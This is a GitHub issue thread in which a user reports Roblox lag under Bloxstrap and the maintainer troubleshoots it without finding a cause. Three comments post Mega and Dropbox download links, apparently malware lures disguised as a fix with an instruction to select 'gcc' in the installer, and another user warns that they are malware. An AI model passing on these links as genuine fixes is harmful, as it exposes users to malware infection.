### ISSUE TITLE
[BUG] Lagging with bloxstrap

### ISSUE THREAD

**Issue by aitherka** [pizzaboxer/bloxstrap#2750]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [X] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [ ] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

i tested the difference between bloxstrap and normal roblox player in speed simulator to see if if its just me, but when i opened bloxstrap sonic speed simulator started lagging lots, but on normal roblox player. i had absolutely no lags even on max, whats the problem?

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by JoxZer** [comment]
DONT DOWNLOAD, this person is sending malware

**Comment by aitherka** [comment]
who's zoraaa? i only know pizzaboxer

**Comment by pizzaboxer** [comment]
Upload your configuration please: https://github.com/pizzaboxer/bloxstrap/wiki/Uploading-your-Bloxstrap-configuration

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pizzaboxer** [comment]
Okay, this looks like it should be fine. Can you try disabling the "Allow Bloxstrap to manage Fast Flags" option, save it, see if that changes anything?

**Comment by aitherka** [comment]
that did not fix it

**Comment by pizzaboxer** [comment]
This seems like an issue outside of Bloxstrap's scope then, since you're basically on a stock config. There isn't really anything I can do here. The difference might stem from the fact that Roblox won't be installed to where it's usually expected to be installed. Sorry about that.
